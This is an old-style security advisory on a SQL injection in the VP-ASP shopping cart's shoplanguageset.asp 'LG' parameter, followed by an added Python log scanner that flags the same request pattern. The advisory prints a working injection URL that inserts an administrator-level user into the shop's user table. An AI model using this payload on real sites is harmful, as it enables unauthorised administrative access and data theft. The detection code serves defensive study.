VP-ASP 6.00-6.08? SQL Injection / Exploit
by tracewar (tracewar@gmail.com)

I'm not responsible for any illegal actions taken by people using the information in this document. If you don't agree, please stop reading and close this text document asap.

* This information is for educational purposes only!
* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.

OK, for the guys at vp-asp: you should choose a different coding language for your shopping cart :(
I'm tired of writing vp-asp advisories 24/7. Until you guys release version 7.00 and take the security issue seriously, I'm not going to audit your code anymore.

-----

THE BUG:

The bug exists in the shoplanguageset.asp file under the "LG" query.

I didn't have a normal vp-asp shopping cart for testing, but this hack should work.

Add user a/a, just like the old one:

/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--

-tracewar
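
A defender-side check for the request pattern described above, as an added example that is not part of the original advisory or of VP-ASP: it scans IIS W3C logs for requests to shoplanguageset.asp whose LG value is not a plain language name. The allow-list pattern, the log field layout and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

TARGET = "/shoplanguageset.asp"  # page named in the advisory
# Assumed shape of a legitimate language name; tighten to the shop's real list.
SAFE_LG = re.compile(r"[A-Za-z][A-Za-z _-]{0,31}")

# Constructed sample log (W3C extended format, field order taken from #Fields).
SAMPLE = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2006-01-01 10:00:00 192.0.2.10 GET /shoplanguageset.asp LG=English 200
2006-01-01 10:00:05 192.0.2.77 GET /shop/ShopLanguageSet.asp lg=English%27%3B-- 200
2006-01-01 10:00:07 192.0.2.10 GET /shoplanguageset.asp LG=Portuguese+Brazil 200
2006-01-01 10:00:09 192.0.2.10 GET /shopdisplay.asp id=5 200
""".splitlines()

def is_suspicious(value):
    """True when a decoded LG value is not a plain language name."""
    return SAFE_LG.fullmatch(value) is None

def lg_values(query):
    """Yield each URL-decoded LG value; ASP treats parameter names case-insensitively."""
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() == "lg":
            yield value

def scan(lines):
    """Return (client_ip, LG value) for requests to TARGET that fail the allow-list."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can differ per server
            continue
        if line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(TARGET):
            continue
        for value in lg_values(row.get("cs-uri-query", "-")):
            if is_suspicious(value):
                hits.append((row.get("c-ip", "?"), value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE):
        print(f"{ip} sent LG={value!r}")
```

The same allow-list test, applied server-side before the LG value reaches any SQL statement, rejects the quote and semicolon that the request in the advisory depends on.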